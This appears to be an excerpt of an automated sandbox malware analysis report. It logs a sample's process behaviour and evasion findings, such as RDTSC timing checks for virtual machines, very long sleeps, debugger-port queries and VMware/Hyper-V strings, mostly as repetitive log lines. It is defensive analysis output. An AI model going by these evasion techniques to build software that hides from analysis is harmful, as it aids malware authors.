Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 667B970
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECDA04
Source: C:\Windows\SysWOW64\raserver.exe API/Special instruction interceptor: Address: 7FFB2CECD744
Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Windows Mail\wab.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Mail\wab.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 1D9B6E second address: 1D9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D1C0 rdtsc 20_2_2249D1C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6330 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3535 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7156 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2575 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 750 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 634 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 586 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\raserver.exe API coverage: 2.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6760 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 7156 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 2575 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8148 Thread sleep count: 750 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 4064 Thread sleep time: -42000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\raserver.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000002.1370620329.0000020476C3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1369707931.000002047516F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.000002047516F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244762105.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244435885.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1371689572.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367860094.000002047773E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1367477793.000002047770E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: powershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW17
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D1C0 rdtsc 20_2_2249D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_045AD6CC LdrInitializeThunk, 16_2_045AD6CC
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString, 25_2_00C8ACA0
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419240 mov eax, dword ptr fs:[00000030h] 20_2_22419240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419240 mov eax, dword ptr fs:[00000030h] 20_2_22419240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245724D mov eax, dword ptr fs:[00000030h] 20_2_2245724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A8243 mov eax, dword ptr fs:[00000030h] 20_2_224A8243
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A8243 mov ecx, dword ptr fs:[00000030h] 20_2_224A8243
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A250 mov eax, dword ptr fs:[00000030h] 20_2_2241A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AD250 mov ecx, dword ptr fs:[00000030h] 20_2_224AD250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DB256 mov eax, dword ptr fs:[00000030h] 20_2_224DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DB256 mov eax, dword ptr fs:[00000030h] 20_2_224DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22426259 mov eax, dword ptr fs:[00000030h] 20_2_22426259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424260 mov eax, dword ptr fs:[00000030h] 20_2_22424260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424260 mov eax, dword ptr fs:[00000030h] 20_2_22424260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424260 mov eax, dword ptr fs:[00000030h] 20_2_22424260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224ED26B mov eax, dword ptr fs:[00000030h] 20_2_224ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224ED26B mov eax, dword ptr fs:[00000030h] 20_2_224ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241826B mov eax, dword ptr fs:[00000030h] 20_2_2241826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22449274 mov eax, dword ptr fs:[00000030h] 20_2_22449274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22461270 mov eax, dword ptr fs:[00000030h] 20_2_22461270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22461270 mov eax, dword ptr fs:[00000030h] 20_2_22461270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 mov eax, dword ptr fs:[00000030h] 20_2_224D0274
